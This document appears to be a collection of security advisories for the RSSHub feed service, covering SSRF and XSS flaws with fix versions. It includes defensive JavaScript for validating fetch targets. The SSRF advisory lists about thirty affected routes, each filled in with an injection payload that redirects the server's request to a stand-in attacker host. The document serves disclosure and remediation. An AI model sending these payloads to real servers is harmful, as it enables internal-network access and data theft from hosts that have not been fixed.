Server-Side Request Forgery (SSRF)
rsshub: Make RSS Great Again!
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) because several endpoints fetch user-supplied URLs without adequate validation. An attacker can use the server as a proxy to issue HTTP GET requests to arbitrary destinations, which may disclose information from the internal network or enable Denial-of-Service (DoS) by making the server fetch very large files or chain many requests.
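The advisory describes the missing control but not its shape. The following is an added example, not RSSHub's code, of the target-URL check a fetcher needs before requesting a user-supplied URL: it parses with the WHATWG URL parser (so alternative host spellings such as 0x7f000001 are normalized before they are compared), restricts the scheme, and refuses loopback, private, link-local (including the 169.254.169.254 cloud-metadata address) and unique-local targets. The function names, the address lists, and the convention of passing the resolved addresses in as a parameter are this example's own assumptions.

```javascript
// Added example, not RSSHub's code: the kind of target check a fix for "improper
// validation of user-supplied URLs" needs before the server fetches anything.
// Function names are illustrative; the blocked ranges are the standard
// loopback / private / link-local / unique-local / multicast blocks.

const IPV4 = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

// IPv4 literals a feed fetcher must never contact on a user's behalf.
function isForbiddenIPv4(ip) {
  const m = IPV4.exec(ip);
  if (!m) return true;                             // not a dotted quad: refuse
  const o = m.slice(1).map(Number);
  if (o.some((n) => n > 255)) return true;
  const [a, b] = o;
  return (
    a === 0 ||                                     // 0.0.0.0/8 ("this" network)
    a === 10 ||                                    // 10/8
    a === 127 ||                                   // loopback
    (a === 100 && b >= 64 && b <= 127) ||          // 100.64/10 shared address space
    (a === 169 && b === 254) ||                    // link-local, incl. cloud metadata
    (a === 172 && b >= 16 && b <= 31) ||           // 172.16/12
    (a === 192 && b === 168) ||                    // 192.168/16
    a >= 224                                       // multicast and reserved
  );
}

function isForbiddenIPv6(ip) {
  const l = ip.toLowerCase();
  if (l === "::" || l === "::1") return true;                 // unspecified, loopback
  if (l.startsWith("::ffff:")) {                               // IPv4-mapped address
    const v4 = l.slice("::ffff:".length);
    return IPV4.test(v4) ? isForbiddenIPv4(v4) : true;         // hex-form mapping: refuse
  }
  return /^f[cd]/.test(l) || /^fe[89ab]/.test(l);              // fc00::/7, fe80::/10
}

function isForbiddenAddress(ip) {
  return ip.includes(":") ? isForbiddenIPv6(ip) : isForbiddenIPv4(ip);
}

// `resolved` is the list of addresses the caller resolved the hostname to. It is a
// parameter so this example runs offline; in production: resolve, validate, then
// connect to that same validated address, otherwise a rebinding DNS name passes the
// check and the real connection goes elsewhere. Returns the normalized URL or throws.
function validateTargetUrl(input, resolved) {
  let u;
  try {
    u = new URL(input);
  } catch {
    throw new Error("malformed URL");
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") {
    throw new Error(`scheme not allowed: ${u.protocol}`);
  }
  if (u.username || u.password) throw new Error("credentials in URL not allowed");
  // The parser has already normalized the host (e.g. 0x7f000001 -> 127.0.0.1);
  // IPv6 literals come back bracketed, so strip the brackets before checking.
  const host = u.hostname.replace(/^\[|\]$/g, "");
  const isLiteral = IPV4.test(host) || host.includes(":");
  const addrs = isLiteral ? [host] : resolved || [];
  if (addrs.length === 0) throw new Error("hostname did not resolve");
  for (const ip of addrs) {
    if (isForbiddenAddress(ip)) throw new Error(`target address not allowed: ${ip}`);
  }
  return u.href;
}

// Yes/no wrapper for callers that do not need the reason.
function isAllowedTarget(input, resolved) {
  try {
    validateTargetUrl(input, resolved);
    return true;
  } catch {
    return false;
  }
}
```

Note that a denylist of addresses is the floor, not the ceiling: where a route only ever needs to reach one upstream site, an allowlist of that site's hostnames is simpler and stronger than any address filter.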
How to fix Server-Side Request Forgery (SSRF)? Upgrade rsshub to version 1.0.0-master.a429472 or higher.
Cross-site Scripting (XSS)
rsshub: Make RSS Great Again!
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) because values taken from unvalidated URL parameters are used without proper sanitization.
How to fix Cross-site Scripting (XSS)? Upgrade rsshub to version 1.0.0-master.c910c4d or higher.
Server-side Request Forgery (SSRF)
rsshub: Make RSS Great Again!
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF): the affected routes interpolate a user-supplied path parameter into the hostname of the upstream URL they fetch, so an attacker can make the server contact a host they control. For example, an attacker who controls the ATTACKER.HOST domain can request an affected route with the parameter set to ATTACKER.HOST%2F%23.
%2F and %23 are the URL-encoded forward slash (/) and pound sign (#). The route decodes the parameter and inserts it into a template of the form https://${input}.defined.host, which yields https://ATTACKER.HOST/#.defined.host. Because everything after # is a URL fragment, the intended .defined.host suffix is no longer part of the host, and the server sends its request to the attacker-controlled domain. The attacker can then observe what the server sends, potentially gaining access to sensitive information, or use the server to mount further attacks.
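As an added illustration (not RSSHub's own code), the following models the template pattern described above. The domain defined.host, the /feed path and the function names are placeholders standing in for any of the affected routes, and the decodeURIComponent call stands in for the URL-decoding a router performs on path parameters. It shows how the decoded value ATTACKER.HOST/# moves the effective host off the intended domain, and a hardened variant that validates the label before interpolation and re-checks the parsed host afterwards.

```javascript
// Added example, not RSSHub's code: it models the hostname-template pattern the
// advisory describes. "defined.host", the "/feed" path and the function names are
// placeholders standing in for any of the affected routes.

// Vulnerable shape: the router has already URL-decoded the path segment, so
// ATTACKER.HOST%2F%23 arrives as "ATTACKER.HOST/#", and the route interpolates it.
function buildUpstreamUrlVulnerable(rawSegment) {
  const input = decodeURIComponent(rawSegment); // router-style decoding (assumed here)
  return `https://${input}.defined.host/feed`;
}

// Where the request actually goes: once the string is parsed as a URL, "#" starts
// the fragment, so ".defined.host/feed" is no longer part of the authority.
function effectiveHost(urlString) {
  return new URL(urlString).hostname; // the parser lowercases the host
}

// Hardened shape: validate the decoded value as a single DNS label (letters, digits,
// hyphens, 1-63 chars, no leading or trailing hyphen) BEFORE interpolation, then
// re-check the parsed host so no parser quirk can move it off the intended domain.
const DNS_LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

function buildUpstreamUrlSafe(rawSegment) {
  const input = decodeURIComponent(rawSegment);
  if (!DNS_LABEL.test(input)) {
    throw new Error(`rejected subdomain label: ${JSON.stringify(input)}`);
  }
  const url = new URL(`https://${input}.defined.host/feed`);
  if (!url.hostname.endsWith(".defined.host")) {
    throw new Error(`unexpected upstream host: ${url.hostname}`);
  }
  return url.href;
}

// Yes/no wrapper for callers that only need to know whether a segment is accepted.
function isAcceptedSegment(rawSegment) {
  try {
    buildUpstreamUrlSafe(rawSegment);
    return true;
  } catch {
    return false;
  }
}
```

The single-label rule fits routes whose parameter is a subdomain. Routes that legitimately take a whole instance hostname (the mastodon routes in the list below pass ATTACKER.HOST without any encoding trick) cannot use it; they need an allowlist of permitted instances or, failing that, a full hostname-syntax check combined with a block on internal and link-local addresses after DNS resolution.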
Note: The following routes are affected by this vulnerability:
/19lou/ATTACKER.HOST%2F%23/foo
/bandisoft/1/ATTACKER.HOST%2F%23
/bendibao/news/ATTACKER.HOST%2F%23
/bitbucket/commits/.* (special treatment: set the BITBUCKET_USERNAME environment variable to ATTACKER.HOST%2F%23)
/blogs/hedwig/ATTACKER.HOST%2F%23
/booth.pm/shop/ATTACKER.HOST%2F%23
/caixin/blog/ATTACKER.HOST%2F%23
/cnjxol/ATTACKER.HOST%2F%23
/dut/ATTACKER.HOST%2F%23
/eagle/blog/ATTACKER.HOST%2F%23
/engadget/ATTACKER.HOST%2F%23
/fashionnetwork/headline/ATTACKER.HOST%2F%23/hello/foo/bar
/gamme/ATTACKER.HOST%2F%23
/gitlab/explore/foo/ATTACKER.HOST%2F%23
/gumroad/ATTACKER.HOST%2F%23/foo
/itch/devlog/ATTACKER.HOST%2F%23/1
/javdb/tags/foo=bar?domain=ATTACKER.HOST
/mastodon/account_id/ATTACKER.HOST/1/statuses
/mastodon/remote/ATTACKER.HOST
/mastodon/timeline/ATTACKER.HOST
/mirror/ATTACKER.HOST%2F%23id (special treatment: the parameter must end with id)
/people/ATTACKER.HOST%2F%23
/pornhub/ATTACKER.HOST%2F%23/category_url/foo
/pornhub/ATTACKER.HOST%2F%23/model/foo
/pornhub/ATTACKER.HOST%2F%23/pornstar/foo
/pornhub/ATTACKER.HOST%2F%23/users/foo
/scitation/ATTACKER.HOST%2F%23/foo
/solidot/ATTACKER.HOST%2F%23
/touhougarakuta/ATTACKER.HOST%2F%23/foo
/yahoo-news/ATTACKER.HOST%2F%23
/zhubai/ATTACKER.HOST%2F%23
/ziroom/room/ATTACKER.HOST%2F%23/hello/foo/bar
How to fix Server-side Request Forgery (SSRF)? Upgrade rsshub to version 1.0.0-master.a66cbcf or higher.